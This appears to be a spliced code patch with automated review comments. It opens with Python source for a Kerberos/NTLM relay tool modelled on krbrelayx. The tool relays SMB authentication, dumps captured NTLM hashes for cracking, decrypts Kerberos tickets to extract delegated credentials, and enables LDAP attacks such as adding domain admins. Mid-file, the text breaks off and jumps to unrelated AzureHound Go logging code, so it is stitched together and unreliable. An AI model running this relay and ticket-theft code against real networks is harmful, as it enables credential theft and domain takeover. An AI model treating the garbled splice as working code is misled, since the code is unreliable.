authenticateMessage['domain_name'], + authenticateMessage['user_name'])) + + #Log this target as processed for this client + self.targetprocessor.logTarget(self.target) + + client.killConnection() + + return None, [packet], errorCode + else: + # We have a session, create a thread and do whatever we want + LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % ( + self.target.scheme, self.target.netloc, authenticateMessage['domain_name'], authenticateMessage['user_name'])) + + # Log this target as processed for this client + self.targetprocessor.logTarget(self.target, True) + + ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'], + authenticateMessage['user_name'], + authenticateMessage['domain_name'], + authenticateMessage['lanman'], authenticateMessage['ntlm']) + 
client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data + + if self.server.getJTRdumpPath() != '': + writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], + self.server.getJTRdumpPath()) + + del (smbData[self.target]) + + self.do_attack(client) + # Now continue with the server + ############################################################# + + respToken = SPNEGO_NegTokenResp() + # accept-completed + respToken['NegResult'] = b'\x00' + + # Status SUCCESS + errorCode = STATUS_SUCCESS + # Let's store it in the connection data + connData['AUTHENTICATE_MESSAGE'] = authenticateMessage + else: + raise Exception("Unknown NTLMSSP MessageType %d" % messageType) + + respParameters['SecurityBlobLength'] = len(respToken) + + respData['SecurityBlobLength'] = respParameters['SecurityBlobLength'] + respData['SecurityBlob'] = respToken.getData() + + else: + # Process Standard Security + #TODO: Fix this for other protocols than SMB [!] + respParameters = smb.SMBSessionSetupAndXResponse_Parameters() + respData = smb.SMBSessionSetupAndXResponse_Data() + sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(SMBCommand['Parameters']) + sessionSetupData = smb.SMBSessionSetupAndX_Data() + sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength'] + sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength'] + sessionSetupData.fromString(SMBCommand['Data']) + + client = smbData[self.target]['SMBClient'] + _, errorCode = client.sendStandardSecurityAuth(sessionSetupData) + + if errorCode != STATUS_SUCCESS: + # Let's return what the target returned, hope the client connects back again + packet = smb.NewSMBPacket() + packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS + packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY + packet['Command'] = recvPacket['Command'] + packet['Pid'] = recvPacket['Pid'] + packet['Tid'] = recvPacket['Tid'] + packet['Mid'] = recvPacket['Mid'] + 
packet['Uid'] = recvPacket['Uid'] + packet['Data'] = '\x00\x00\x00' + packet['ErrorCode'] = errorCode >> 16 + packet['ErrorClass'] = errorCode & 0xff + + #Log this target as processed for this client + self.targetprocessor.logTarget(self.target) + + # Finish client's connection + #client.killConnection() + + return None, [packet], errorCode + else: + # We have a session, create a thread and do whatever we want + LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % ( + self.target.scheme, self.target.netloc, sessionSetupData['PrimaryDomain'], + sessionSetupData['Account'])) + + self.authUser = ('%s/%s' % (sessionSetupData['PrimaryDomain'], sessionSetupData['Account'])).upper() + + # Log this target as processed for this client + self.targetprocessor.logTarget(self.target, True) + + ntlm_hash_data = outputToJohnFormat('', sessionSetupData['Account'], sessionSetupData['PrimaryDomain'], + sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd']) + client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data + + if self.server.getJTRdumpPath() != '': + writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], + self.server.getJTRdumpPath()) + + del (smbData[self.target]) + + self.do_attack(client) + # Now continue with the server + ############################################################# + + respData['NativeOS'] = smbServer.getServerOS() + respData['NativeLanMan'] = smbServer.getServerOS() + respSMBCommand['Parameters'] = respParameters + respSMBCommand['Data'] = respData + + # From now on, the client can ask for other commands + connData['Authenticated'] = True + + ############################################################# + # SMBRelay + smbServer.setConnectionData('SMBRelay', smbData) + ############################################################# + smbServer.setConnectionData(connId, connData) + + return [respSMBCommand], None, errorCode + ################################################################################ + + def 
do_attack(self, authdata): + # Do attack. Note that unlike the HTTP server, the config entries are stored in the current object and not in any of its properties + self.authUser = '%s/%s' % (authdata['domain'], authdata['username']) + # No SOCKS, since socks is pointless when you can just export the tickets + # instead we iterate over all the targets + for target in self.config.target.originalTargets: + parsed_target = target + if parsed_target.scheme.upper() in self.config.attacks: + client = self.config.protocolClients[target.scheme.upper()](self.config, parsed_target) + client.initConnection(authdata, self.config.dcip) + # We have an attack.. go for it + attack = self.config.attacks[parsed_target.scheme.upper()] + client_thread = attack(self.config, client.session, self.authUser) + client_thread.start() + else: + LOG.error('No attack configured for %s', parsed_target.scheme.upper()) + + def do_relay(self, authdata): + self.authUser = '%s/%s' % (authdata['domain'], authdata['username']) + sclass, host = authdata['service'].split('/') + for target in self.config.target.originalTargets: + parsed_target = target + if host.lower() in parsed_target.hostname.lower(): + # Found a target with the same SPN + client = self.config.protocolClients[target.scheme.upper()](self.config, parsed_target) + client.initConnection(authdata, self.config.dcip) + # We have an attack.. go for it + attack = self.config.attacks[parsed_target.scheme.upper()] + client_thread = attack(self.config, client.session, self.authUser) + client_thread.start() + return + # Still here? Then no target was found matching this SPN + LOG.error('No target configured that matches the hostname of the SPN in the ticket: %s', parsed_target.netloc.lower()) + + def _start(self): + self.server.daemon_threads=True + self.server.serve_forever() + LOG.info('Shutting down SMB Server') + self.server.server_close() + + def run(self): + LOG.info("Setting up SMB Server") + self._start() 
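Review bot: In `SmbSessionSetup`, the tail after the bare `except:` returns `errorCode`, which is never assigned anywhere in the function, and reads `respToken`, which is bound only in branches that normally return, so a decode failure is printed and then surfaces as a NameError instead of a clean SMB status. As far as the flattened hunk shows, that tail should become an explicit failure such as `return [respSMBCommand], None, STATUS_ACCESS_DENIED` (the constant is already imported), with the handler narrowed to `except Exception:`. On the Kerberos branch `SecurityBufferLength` is taken from `len(respToken)` while `Buffer` holds `encoder.encode(respToken)`; the length should come from the encoded bytes, as the unsupported-mechanism branch already does with `len(respTokenData)`. In `SmbComNegotiate`, `smbData.has_key(self.target)` fails on Python 3, which the package needs anyway since kerberos.py in this patch uses an f-string; `self.target in smbData` is the portable form. Part of `SmbSessionSetupAndX` is missing from the page, so that method is not covered here.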
diff --git a/kerbexec/utils/__init__.py b/kerbexec/utils/__init__.py
new file mode 100644
index 0000000..2ae2839
--- /dev/null
+++ b/kerbexec/utils/__init__.py
@@ -0,0 +1 @@
+pass
diff --git a/kerbexec/utils/config.py b/kerbexec/utils/config.py
new file mode 100644
index 0000000..580a14f
--- /dev/null
+++ b/kerbexec/utils/config.py
@@ -0,0 +1,57 @@
+"""
+Config class, mostly extended from ntlmrelayx
+"""
+from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
+
+class KrbRelayxConfig(NTLMRelayxConfig):
+ def __init__(self):
+ NTLMRelayxConfig.__init__(self)
+
+ # Auth options
+ self.dcip = None
+ self.aeskey = None
+ self.hashes = None
+ self.password = None
+ self.israwpassword = False
+ self.salt = None
+
+ # Krb options
+ self.format = 'ccache'
+
+ # LDAP options
+ self.dumpdomain = True
+ self.addda = True
+ self.aclattack = True
+ self.validateprivs = True
+ self.escalateuser = None
+ self.addcomputer = False
+ self.delegateaccess = False
+
+ # Custom options
+ self.victim = None
+
+ # Make sure we have a fixed version of this to avoid incompatibilities with impacket
+ def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, dumplaps, dumpgmsa, dumpadcs, sid):
+ self.dumpdomain = dumpdomain
+ self.addda = addda
+ self.aclattack = aclattack
+ self.validateprivs = validateprivs
+ self.escalateuser = escalateuser
+ self.addcomputer = addcomputer
+ self.delegateaccess = delegateaccess
+ self.dumplaps = dumplaps
+ self.dumpgmsa = dumpgmsa
+ self.dumpadcs = dumpadcs
+ self.sid = sid
+
+ def setAuthOptions(self, aeskey, hashes, dcip, password, salt, israwpassword=False):
+ self.dcip = dcip
+ self.aeskey = aeskey
+ self.hashes = hashes
+ self.password = password
+ self.salt = salt
+ self.israwpassword = israwpassword
+
+ def setKrbOptions(self, outformat, victim):
+ self.format = outformat
+ self.victim = victim
\ No newline at end of file
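Review bot: In kerbexec/utils/config.py, `setLDAPOptions` stores `dumplaps`, `dumpgmsa`, `dumpadcs` and `sid`, but `__init__` gives none of them a default, unlike the seven other LDAP options it initialises. Unless `NTLMRelayxConfig.__init__` already defines them (not visible here), reading any of them before `setLDAPOptions` has run raises AttributeError. I would add them under the `# LDAP options` block in `__init__`, for example `self.dumplaps = self.dumpgmsa = self.dumpadcs = False` and `self.sid = None`. The comment above `setLDAPOptions` could also name the impacket signature this override is pinned to, since that is the stated reason the method exists.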
diff --git a/kerbexec/utils/kerberos.py b/kerbexec/utils/kerberos.py
new file mode 100644
index 0000000..cb2c9ff
--- /dev/null
+++ b/kerbexec/utils/kerberos.py
@@ -0,0 +1,335 @@ +from __future__ import unicode_literals +import struct +import datetime +import random +from binascii import unhexlify, hexlify +from pyasn1.type.univ import noValue +from pyasn1.codec.der import decoder, encoder +from pyasn1.error import PyAsn1Error +from ldap3 import Server, Connection, NTLM, ALL, SASL, KERBEROS +from ldap3.core.results import RESULT_STRONGER_AUTH_REQUIRED +from ldap3.operation.bind import bind_operation +from impacket.spnego import SPNEGO_NegTokenInit, TypesMech +from impacket.krb5.gssapi import KRB5_AP_REQ, GSS_C_DELEG_FLAG +from impacket.krb5.asn1 import AP_REQ, AS_REP, TGS_REQ, Authenticator, TGS_REP, seq_set, seq_set_iter, PA_FOR_USER_ENC, \ + Ticket as TicketAsn1, EncTGSRepPart, EncTicketPart, AD_IF_RELEVANT, Ticket as TicketAsn1, KRB_CRED, EncKrbCredPart + +from impacket.krb5.crypto import Key, _enctype_table, Enctype, InvalidChecksum, string_to_key +from .krbcredccache import KrbCredCCache +from .spnego import GSSAPIHeader_SPNEGO_Init, GSSAPIHeader_KRB5_AP_REQ +from impacket import LOG +from impacket.krb5.types import Principal, KerberosTime, Ticket +from impacket.krb5 import constants +from impacket.krb5.kerberosv5 import getKerberosTGS +from Cryptodome.Hash import HMAC, MD4 + +def get_auth_data(token, options): + # Do we have a Krb ticket? 
+ blob = decoder.decode(token, asn1Spec=GSSAPIHeader_SPNEGO_Init())[0] + data = blob['innerContextToken']['negTokenInit']['mechToken'] + try: + payload = decoder.decode(data, asn1Spec=GSSAPIHeader_KRB5_AP_REQ())[0] + except PyAsn1Error: + raise Exception('Error obtaining Kerberos data') + # If so, assume all is fine and we can just pass this on to the legit server + # we just need to get the correct target name + apreq = payload['apReq'] + + # Get ticket data + domain = str(apreq['ticket']['realm']).lower() + # Assume this is NT_SRV_INST with 2 labels (not sure this is always the case) + sname = '/'.join([str(item) for item in apreq['ticket']['sname']['name-string']]) + + # We dont actually know the client name, either use unknown$ or use the user specified + if options.victim: + username = options.victim + else: + username = f"unknown{random.randint(0, 10000):04d}$" + return { + "domain": domain, + "username": username, + "krbauth": token, + "service": sname, + "apreq": apreq + } + +def get_kerberos_loot(token, options): + from pyasn1 import debug + # debug.setLogger(debug.Debug('all')) + # Do we have a Krb ticket? 
+ blob = decoder.decode(token, asn1Spec=GSSAPIHeader_SPNEGO_Init())[0] + # print str(blob) + + data = blob['innerContextToken']['negTokenInit']['mechToken'] + + try: + payload = decoder.decode(data, asn1Spec=GSSAPIHeader_KRB5_AP_REQ())[0] + except PyAsn1Error: + raise Exception('Error obtaining Kerberos data') + # print payload + # It is an AP_REQ + decodedTGS = payload['apReq'] + # print decodedTGS + + # Get ticket data + + cipherText = decodedTGS['ticket']['enc-part']['cipher'] + + # Key Usage 2 + # AS-REP Ticket and TGS-REP Ticket (includes tgs session key or + # application session key), encrypted with the service key + # (section 5.4.2) + + newCipher = _enctype_table[int(decodedTGS['ticket']['enc-part']['etype'])] + + # Create decryption keys from specified Kerberos keys + if options.hashes is not None: + nthash = options.hashes.split(':')[1] + else: + nthash = '' + + aesKey = options.aeskey or '' + + allciphers = [ + int(constants.EncryptionTypes.rc4_hmac.value), + int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value), + int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value) + ] + + # Store Kerberos keys + # TODO: get the salt from preauth info (requires us to send AS_REQs to the DC) + keys = {} + + if nthash != '': + keys[int(constants.EncryptionTypes.rc4_hmac.value)] = unhexlify(nthash) + if aesKey != '': + if len(aesKey) == 64: + keys[int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value)] = unhexlify(aesKey) + else: + keys[int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value)] = unhexlify(aesKey) + + ekeys = {} + for kt, key in keys.items(): + ekeys[kt] = Key(kt, key) + + # Calculate Kerberos keys from specified password/salt + if options.password and options.salt: + for cipher in allciphers: + if cipher == 23 and options.israwpassword: + # RC4 calculation is done manually for raw passwords + md4 = MD4.new() + md4.update(options.password) + ekeys[cipher] = Key(cipher, md4.digest()) + else: + # Do conversion magic for raw 
passwords + if options.israwpassword: + rawsecret = options.password.decode('utf-16-le', 'replace').encode('utf-8', 'replace') + else: + # If not raw, it was specified from the command line, assume it's not UTF-16 + rawsecret = options.password + ekeys[cipher] = string_to_key(cipher, rawsecret, options.salt) + LOG.debug('Calculated type %d Kerberos key: %s', cipher, hexlify(ekeys[cipher].contents)) + + # Select the correct encryption key + try: + key = ekeys[decodedTGS['ticket']['enc-part']['etype']] + # This raises a KeyError (pun intended) if our key is not found + except KeyError: + LOG.error('Could not find the correct encryption key! Ticket is encrypted with keytype %d, but keytype(s) %s were supplied', + decodedTGS['ticket']['enc-part']['etype'], + ', '.join([str(enctype) for enctype in ekeys.keys()])) + return None + + # Recover plaintext info from ticket + try: + plainText = newCipher.decrypt(key, 2, cipherText) + except InvalidChecksum: + LOG.error('Ciphertext integrity failed. Most likely the account password or AES key is incorrect') + if options.salt: + LOG.info('You specified a salt manually. 
Make sure it has the correct case.') + return + LOG.debug('Ticket decrypt OK') + encTicketPart = decoder.decode(plainText, asn1Spec=EncTicketPart())[0] + sessionKey = Key(encTicketPart['key']['keytype'], bytes(encTicketPart['key']['keyvalue'])) + + # Key Usage 11 + # AP-REQ Authenticator (includes application authenticator + # subkey), encrypted with the application session key + # (Section 5.5.1) + + # print encTicketPart + flags = encTicketPart['flags'].asBinary() + # print flags + # for flag in TicketFlags: + # if flags[flag.value] == '1': + # print flag + # print flags[TicketFlags.ok_as_delegate.value] + cipherText = decodedTGS['authenticator']['cipher'] + newCipher = _enctype_table[int(decodedTGS['authenticator']['etype'])] + # Recover plaintext info from authenticator + plainText = newCipher.decrypt(sessionKey, 11, cipherText) + + authenticator = decoder.decode(plainText, asn1Spec=Authenticator())[0] + # print authenticator + + # The checksum may contain the delegated ticket + cksum = authenticator['cksum'] + if cksum['cksumtype'] != 32771: + raise Exception('Checksum is not KRB5 type: %d' % cksum['cksumtype']) + + # Checksum as in 4.1.1 [RFC4121] + # Fields: + # 0-3 Length of channel binding info (fixed at 16) + # 4-19 channel binding info + # 20-23 flags + # 24-25 delegation option identifier + # 26-27 length of deleg field + # 28..(n-1) KRB_CRED message if deleg is used (n = length of deleg + 28) + # n..last extensions + flags = struct.unpack('. 
+
+package logger
+
+import (
+ "syscall"
+
+ "github.com/rs/zerolog"
+ "golang.org/x/sys/windows"
+ "golang.org/x/sys/windows/svc/eventlog"
+)
+
+func NewEventLogWriter(name string) (zerolog.LevelWriter, error) {
+ if elog, err := eventlog.Open(name); err != nil {
+ return nil, err
+ } else {
+ return EventLogLevelWriter{elog}, nil
+ }
+}
+
+type EventLogLevelWriter struct {
+ eventLog *eventlog.Log
+}
+
+func (s EventLogLevelWriter) Write(msg []byte) (int, error) {
+ return s.WriteLevel(zerolog.InfoLevel, msg)
+}
+
+func (s EventLogLevelWriter) WriteLevel(level zerolog.Level, msg []byte) (n int, err error) {
+ var eventType uint16
+ switch level {
+ case zerolog.Disabled:
+ return 0, nil
+ case zerolog.ErrorLevel:
+ eventType = windows.EVENTLOG_ERROR_TYPE
+ default:
+ eventType = windows.EVENTLOG_INFORMATION_TYPE
+ }
+
+ sysString := []*uint16{syscall.StringToUTF16Ptr(string(msg))}
+ if err := windows.ReportEvent(s.eventLog.Handle, eventType, 0, 1, 0, 1, 0, &sysString[0], nil); err != nil {
+ return 0, err
+ } else {
+ return len(msg), nil
+ }
+}
+
+func (s EventLogLevelWriter) Close() error {
+ return s.eventLog.Close()
+}
diff --git a/logger/internal/logger.go b/logger/internal/logger.go
new file mode 100644
index 0000000..e27fa5c
--- /dev/null
+++ b/logger/internal/logger.go
@@ -0,0 +1,176 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package internal
+
+import (
+ "io"
+ "os"
+ "path"
+ "time"
+
+ "github.com/go-logr/logr"
+ "github.com/rs/zerolog"
+)
+
+const (
+ BaseCallDepth int = 2
+
+ // ErrorLevel limits logs to ERROR messages only
+ ErrorLevel int = -1
+ // MaxInfoLevel allows ERROR, INFO, DEBUG and TRACE messages
+ MaxInfoLevel int = 2
+ // MedInfoLevel allows ERROR, INFO, and DEBUG messages
+ MedInfoLevel int = 1
+ // MinInfoLevel limits logs to ERROR and INFO messages
+ MinInfoLevel int = 0
+)
+
+type logSink struct {
+ logger *zerolog.Logger
+ name string
+ callDepth int
+}
+
+// Options allows the user to set various options for the logr.Logger implementation
+type Options struct {
+ // Structured enables structured logging
+ Structured bool
+ // Colors enables colors for unstructured logging only
+ Colors bool
+ // Writers defines which transports the logger should write to
+ Writers []io.Writer
+ // Level defines the logging verbosity; defaults to MinInfoLevel
+ Level int
+}
+
+// NewLogger returns a new logr.Logger instance
+func NewLogger(options Options) logr.Logger {
+ if len(options.Writers) == 0 {
+ options.Writers = append(options.Writers, os.Stderr)
+ }
+
+ if !options.Structured {
+ for i, writer := range options.Writers {
+ options.Writers[i] = zerolog.ConsoleWriter{Out: writer, NoColor: !options.Colors, TimeFormat: time.RFC3339}
+ }
+ }
+
+ writer := zerolog.MultiLevelWriter(options.Writers...)
+ logger := zerolog.New(writer).With().Timestamp().Logger()
+
+ if options.Level < MinInfoLevel {
+ logger = logger.Level(zerolog.ErrorLevel)
+ } else {
+ lvl := calcLevel(options.Level)
+ logger = logger.Level(lvl)
+ }
+
+ return logr.New(&logSink{
+ logger: &logger,
+ name: "",
+ callDepth: BaseCallDepth,
+ })
+}
+
+// Enabled tests whether this logr.LogSink is enabled at the specified V-level.
+// For example, commandline flags might be used to set the logging
+// verbosity and disable some info logs.
+func (s logSink) Enabled(level int) bool {
+ lvl := calcLevel(level)
+ if logEvent := s.logger.WithLevel(lvl); logEvent == nil {
+ return false
+ } else {
+ return logEvent.Enabled()
+ }
+}
+
+// Error logs an error, with the given message and key/value pairs as
+// context. See logr.Logger.Error for more details.
+func (s logSink) Error(err error, msg string, keysAndValues ...interface{}) {
+ logEvent := s.logger.Error().Err(err)
+ s.log(logEvent, msg, keysAndValues)
+}
+
+// Info logs a non-error message with the given key/value pairs as context.
+// The level argument is provided for optional logging. This method will
+// only be called when Enabled(level) is true. See logr.Logger.Info for more
+// details.
+func (s logSink) Info(level int, msg string, keysAndValues ...interface{}) {
+ lvl := calcLevel(level)
+ logEvent := s.logger.WithLevel(lvl)
+ s.log(logEvent, msg, keysAndValues)
+}
+
+// Init receives optional information about the logr library for logr.LogSink
+// implementations that need it.
+func (s *logSink) Init(info logr.RuntimeInfo) {
+ s.callDepth = info.CallDepth + BaseCallDepth
+}
+
+// WithName returns a new logr.LogSink with the specified name appended. See
+// logr.Logger.WithName for more details.
+func (s logSink) WithName(name string) logr.LogSink {
+ s.name = path.Join(s.name, name)
+ return &s
+}
+
+// WithValues returns a new logr.LogSink with additional key/value pairs. See
+// logr.Logger.WithValues for more details.
+func (s logSink) WithValues(keysAndValues ...interface{}) logr.LogSink {
+ logger := s.logger.With().Fields(keysAndValues).Logger()
+ s.logger = &logger
+ return &s
+}
+
+// WithCallDepth returns a logr.LogSink that will offset the call
+// stack by the specified number of frames when logging call
+// site information.
+//
+// If depth is 0, the logr.LogSink should skip exactly the number
+// of call frames defined in logr.RuntimeInfo.CallDepth when Info
+// or Error are called, i.e. the attribution should be to the
+// direct caller of logr.Logger.Info or logr.Logger.Error.
+//
+// If depth is 1 the attribution should skip 1 call frame, and so on.
+// Successive calls to this are additive.
+func (s logSink) WithCallDepth(depth int) logr.LogSink {
+ s.callDepth += depth
+ return &s
+}
+
+func (s logSink) log(e *zerolog.Event, msg string, keysAndValues []interface{}) {
+ if e != nil {
+ if s.name != "" {
+ e.Str("name", s.name)
+ }
+
+ e.Fields(keysAndValues)
+ e.CallerSkipFrame(s.callDepth)
+ e.Msg(msg)
+ }
+}
+
+func calcLevel(level int) zerolog.Level {
+ lvl := level
+ if level < MinInfoLevel {
+ lvl = MinInfoLevel
+ } else if level > MaxInfoLevel {
+ lvl = MaxInfoLevel
+ }
+ return zerolog.InfoLevel - zerolog.Level(lvl)
+}
diff --git a/logger/internal/logger_test.go b/logger/internal/logger_test.go
new file mode 100644
index 0000000..eab2dd5
--- /dev/null
+++ b/logger/internal/logger_test.go
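Review bot: In `NewLogger`, the unstructured branch replaces every entry of `options.Writers` with a `zerolog.ConsoleWriter`, not only the console. As far as I can tell a wrapped `zerolog.LevelWriter` such as the `EventLogLevelWriter` added earlier in this patch is then reached only through `Write`, so error records land in the event log as information events, and with `Colors: true` a log file receives ANSI escape sequences. The assignment `options.Writers[i] = ...` also writes into the slice the caller passed in. Leaving level-aware writers unwrapped with `if _, ok := writer.(zerolog.LevelWriter); ok { continue }` at the top of the loop, and building a fresh slice instead of assigning in place, would address both.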
@@ -0,0 +1,135 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package internal
+
+import (
+ "bytes"
+ "fmt"
+ "io"
+ "testing"
+ "time"
+
+ "github.com/go-logr/logr"
+)
+
+const (
+ LogErrorTemplate string = `{"level":"error","error":"I'm an error","time":"%s","message":"Something happened"}%s`
+ LogInfoTemplate string = `{"level":"info","foo":"bar","name":"fakeName","baz":42,"buzz":true,"time":"%s","message":"teapot"}%s`
+ LogInfoUnstructuredTemplate string = "%s INF teapot baz=42 buzz=true foo=bar name=fakeName%s"
+)
+
+func TestError(t *testing.T) {
+ writer := &bytes.Buffer{}
+ options := Options{
+ Structured: true,
+ Writers: []io.Writer{writer},
+ }
+ logger := NewLogger(options)
+ logError(logger)()
+
+ got := writer.String()
+ want := fmt.Sprintf(LogErrorTemplate, now(), "\n")
+
+ if got != want {
+ t.Errorf("got: %v\nwant: %v", got, want)
+ }
+}
+
+func TestInfo(t *testing.T) {
+ writer := &bytes.Buffer{}
+ options := Options{
+ Structured: true,
+ Writers: []io.Writer{writer},
+ }
+ logger := NewLogger(options)
+ logInfo(logger)()
+
+ got := writer.String()
+ want := fmt.Sprintf(LogInfoTemplate, now(), "\n")
+
+ if got != want {
+ t.Errorf("got: %v\nwant: %v", got, want)
+ }
+}
+
+func TestInfoErrorLevel(t *testing.T) {
+ writer := &bytes.Buffer{}
+ options := Options{
+ Structured: true,
+ Writers: []io.Writer{writer},
+ Level: ErrorLevel,
+ }
+ logger := NewLogger(options)
+ logInfo(logger)()
+
+ got := writer.String()
+ want := ""
+
+ if got != want {
+ t.Errorf("got: %v\nwant: %v", got, want)
+ }
+}
+
+func TestInfoUnstructured(t *testing.T) {
+ writer := &bytes.Buffer{}
+ options := Options{
+ Writers: []io.Writer{writer},
+ }
+ logger := NewLogger(options)
+ logInfo(logger)()
+
+ got := writer.String()
+ want := fmt.Sprintf(LogInfoUnstructuredTemplate, now(), "\n")
+
+ if got != want {
+ t.Errorf("got: %v\nwant: %v", got, want)
+ }
+}
+
+func TestEnabled(t *testing.T) {
+ errorsOnlyLogger := NewLogger(Options{Level: ErrorLevel})
+ infoLogger := NewLogger(Options{Level: MinInfoLevel})
+
+ if errorsOnlyLogger.GetSink().Enabled(MinInfoLevel) != false {
+ t.Errorf("got: %v\nwant: %v", infoLogger.Enabled(), true)
+ }
+
+ if infoLogger.GetSink().Enabled(MinInfoLevel-1) != true {
+ t.Errorf("got: %v\nwant: %v", infoLogger.Enabled(), true)
+ }
+
+ if infoLogger.GetSink().Enabled(MaxInfoLevel+1) != false {
+ t.Errorf("got: %v\nwant: %v", infoLogger.Enabled(), false)
+ }
+}
+
+func logInfo(logger logr.Logger) func() {
+ return func() {
+ logger.WithName("fakeName").WithValues("foo", "bar").Info("teapot", "baz", 42, "buzz", true)
+ }
+}
+
+func logError(logger logr.Logger) func() {
+ return func() {
+ logger.Error(fmt.Errorf("I'm an error"), "Something happened")
+ }
+}
+
+func now() string {
+ return time.Now().Format(time.RFC3339)
+}
diff --git a/logger/log.go b/logger/log.go
new file mode 100644
index 0000000..546937f
--- /dev/null
+++ b/logger/log.go
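Review bot: `TestError`, `TestInfo` and `TestInfoUnstructured` compare the whole log line against `now()`, which is formatted again after the logger has already written, so a run that straddles a second boundary fails spuriously. Decoding the emitted line and checking the `time` field separately from the other fields would make the comparison deterministic. In `TestEnabled` every failure message prints `infoLogger.Enabled()` instead of the value under test, and the first one reports `want true` for a check that expects `false`; `t.Errorf("got: %v\nwant: %v", errorsOnlyLogger.GetSink().Enabled(MinInfoLevel), false)` would report the real mismatch.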
@@ -0,0 +1,47 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+//go:build !windows
+// +build !windows
+
+package logger
+
+import (
+ "io"
+ "os"
+
+ "github.com/bloodhoundad/azurehound/v2/config"
+ logger "github.com/bloodhoundad/azurehound/v2/logger/internal"
+ "github.com/go-logr/logr"
+)
+
+func setupLogger() (*logr.Logger, error) {
+ options := logger.Options{
+ Level: config.VerbosityLevel.Value().(int),
+ Structured: config.JsonLogs.Value().(bool),
+ Colors: true,
+ Writers: []io.Writer{os.Stderr},
+ }
+
+ // emit logs to file if configured
+ if fileLogWriter := getFileLogLevelWriter(); fileLogWriter != nil {
+ options.Writers = append(options.Writers, fileLogWriter)
+ }
+
+ logr := logger.NewLogger(options)
+ return &logr, nil
+}
diff --git a/logger/log_windows.go b/logger/log_windows.go
new file mode 100644
index 0000000..7898678
--- /dev/null
+++ b/logger/log_windows.go
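Review bot: The single-value assertions `config.VerbosityLevel.Value().(int)` and `config.JsonLogs.Value().(bool)` in `setupLogger` panic if the stored value has any other dynamic type, while `getFileLogLevelWriter` in logger/utils.go already uses the checked form for `config.LogFile`. The function returns an error that is currently always nil, so a checked assertion fits: `level, ok := config.VerbosityLevel.Value().(int)` followed by `if !ok { return nil, fmt.Errorf("verbosity is not an int: %T", config.VerbosityLevel.Value()) }`, which needs the `fmt` import. `Colors: true` is also applied to the file writer appended a few lines below, where plain text is presumably wanted. The same two assertions appear in logger/log_windows.go.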
@@ -0,0 +1,69 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package logger
+
+import (
+ "io"
+ "os"
+
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ logger "github.com/bloodhoundad/azurehound/v2/logger/internal"
+ "github.com/go-logr/logr"
+ "github.com/rs/zerolog"
+ "golang.org/x/sys/windows/svc"
+)
+
+var eventLogWriter zerolog.LevelWriter
+
+func setupLogger() (*logr.Logger, error) {
+ var (
+ logr logr.Logger
+ options = logger.Options{
+ Level: config.VerbosityLevel.Value().(int),
+ Structured: config.JsonLogs.Value().(bool),
+ Colors: false,
+ Writers: []io.Writer{os.Stderr},
+ }
+ )
+
+ // services should emit messages to the windows event log
+ if eventLogWriter := getEventLogLevelWriter(); eventLogWriter != nil {
+ options.Writers = append(options.Writers, eventLogWriter)
+ }
+
+ // emit logs to file if configured
+ if fileLogWriter := getFileLogLevelWriter(); fileLogWriter != nil {
+ options.Writers = append(options.Writers, fileLogWriter)
+ }
+
+ logr = logger.NewLogger(options)
